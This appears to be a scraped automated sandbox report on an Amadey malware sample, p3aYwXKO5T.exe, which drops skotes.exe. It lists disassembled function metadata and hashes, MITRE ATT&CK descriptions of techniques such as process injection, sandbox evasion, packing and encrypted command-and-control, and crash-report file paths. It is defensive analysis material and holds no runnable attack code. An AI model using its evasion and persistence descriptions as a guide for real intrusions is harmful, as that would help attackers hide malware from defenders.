Download Yara Rule

APIs

_free.LIBCMT ref: 020DA9E5
_free.LIBCMT ref: 020DAA19

Strings

x!F, xrefs: 020DAA0C

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction ID: 0d673eb84012b35f6f7c342ef47a4d5c79db79ce123330daa67abeb60caabdf6
Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction Fuzzy Hash: B501A73571BB217AD63272786E00BFE73896F02B38B161321FD20B51E0EB9688117999

Function 0043A72E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A77E
_free.LIBCMT ref: 0043A7B2

Strings

x!F, xrefs: 0043A7A5

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction ID: a9be1d7356db9bde33694ffb89096973f5cd6b257b37c16ae0656b7abf5e94eb
Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction Fuzzy Hash: 0F01D831985A203AD52532355C82B6B12299B0D72CF20322BFBA0653E2FB8DCC3201DF

Function 00420C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00420CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00420D2A

Strings

p[F, xrefs: 00420CCF

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[F
API String ID: 3303180142-1832964472
Opcode ID: be93dd124044e3a26704792a574e288825ec5497b2495a662014ec0407777033
Instruction ID: 460490d00550286d74d196cd5a9549fc7c942c0fed1932104b3464a6bc3d5762
Opcode Fuzzy Hash: be93dd124044e3a26704792a574e288825ec5497b2495a662014ec0407777033
Instruction Fuzzy Hash: 510180B0F156249EDB10ABBA755135DA6E06B08318FA0406FE405EB283DA7C5E41876E

Function 0043E259 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284
GetACP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E29B

Strings

avC, xrefs: 0043E25B

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: avC
API String ID: 0-551859807
Opcode ID: 45530060523da157e537cdb1f7866b3f2572323f108b7a3cdd4d943330284399
Instruction ID: 791638059a19eb7d03b8e6799ac96854013f7a9a4db5e4c168316c4cba85a157
Opcode Fuzzy Hash: 45530060523da157e537cdb1f7866b3f2572323f108b7a3cdd4d943330284399
Instruction Fuzzy Hash: 15F0F630801202CBE704DFA6E8097AE37B4AB45339F1103D5E439962E2D7B4A841C78A

Function 020BD378 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00465750), ref: 020BD383
RtlLeaveCriticalSection.NTDLL(00465750), ref: 020BD3C0

Strings

PWF, xrefs: 020BD37D

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: PWF
API String ID: 3168844106-4189640852
Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction ID: 7bf9c7e24dbcad56aecec2a2f160a0f90dd6c153c29bec27514c69f11ea83920
Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction Fuzzy Hash: A4F02734100700DFC3365F14DC84BA9B7E4EF41B35F10023EEA55472E1D7711842DA16

Function 0041D111 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D11C
RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D159

Strings

PWF, xrefs: 0041D116

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: PWF
API String ID: 3168844106-4189640852
Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction ID: 988e6a820899fd4ceb20f62ffb6a68805dae8dfe7a3415f919f541f0d2922133
Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction Fuzzy Hash: 16F0E275900601EFC3149F14EC44AA677A5EB45736F20022EEA55473D0D7391C82CA1A

Function 0042B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B961

Strings

pContext, xrefs: 0042B959

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: cb3ebfd47da852ef65d275a916c0fe48e2a73adc5c276bf3244062de85799675
Instruction ID: 6d6ffe11be8a4b1ace8c2f2c8a58b350c0e533cc07d7fbfc7cd1cba97992ca6a
Opcode Fuzzy Hash: cb3ebfd47da852ef65d275a916c0fe48e2a73adc5c276bf3244062de85799675
Instruction Fuzzy Hash: 95E02B39B0020467CB04F7A5D845D9DBB789E84715710401BE911A3352EB78AA44C6D8

Function 020C25B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 020C255C
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 020C2572

Part of subcall function 020C2A99: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 020C2AA8
Part of subcall function 020C2A99: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 020C2ABC
Part of subcall function 020C2A99: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 020C2ADD
Part of subcall function 020C2A99: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 020C2B46
Part of subcall function 020C2A99: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 020C2CB4

Strings

p[F, xrefs: 020C256A

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
String ID: p[F
API String ID: 3302332639-1832964472
Opcode ID: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
Instruction ID: faa5cec505e66ed5df6b15831a670d1bdb89f1d2362ea605e125635b4083bd01
Opcode Fuzzy Hash: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
Instruction Fuzzy Hash: 44E01AB0700701DBDB21FBA5E920BAE33E9AB08B00F90042ED504CA650EBB6E401AF19

Function 004234CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004234FC

Strings

version, xrefs: 004234E1
pScheduler, xrefs: 004234F4

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 25f4eee51d5eef7acfdb44f59e56ba93899965d293b766ae16e0c4b89fe0dab4
Instruction ID: 3122fea0a665ef1032727265859f97669ea40e48c80579a70b610642a631ca87
Opcode Fuzzy Hash: 25f4eee51d5eef7acfdb44f59e56ba93899965d293b766ae16e0c4b89fe0dab4
Instruction Fuzzy Hash: 28E04F34A40208B6CB26FE56E84BBC977749B1474BF94C157BC11111929BFCA78CCA89

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report p3aYwXKO5T.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_739d586cc05ff593cef168b7ca7bd46426c9c3_92367cbf_474a8dae-3ccd-43ed-ac57-4df3917c0b2b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_0ee9c536-c995-43ff-92ed-ceaea6261b42\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_25c7a264-285f-476a-bf9c-5bd695861cda\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_26959f14-b1e3-4dfc-977a-d6b37ebf56ed\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_3bf719fb-40db-4ba8-9620-738d2049b21e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_6a3dd91d-87cf-4339-a240-a0ce1f09b8dc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_75365df1-5378-4519-9779-2764413d9978\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_790c495c-a558-4326-8bf7-54f23c25712a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_a893414a-5aa6-4a61-8118-d344bc6c0651\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_ecc606bd-04cb-4ad5-9c3e-d14d1d254d43\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_156860db-0bc0-4e41-b7c6-903726266438\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_99c65e1a-ffe2-4de3-871c-0a5eee8df84f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_ad27e63f-16e9-412d-ae61-dc44aa9e2cee\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_fdd1cbc7-4de7-4dd1-a680-853a1c90eb95\Report.wer

Windows Analysis Report
p3aYwXKO5T.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre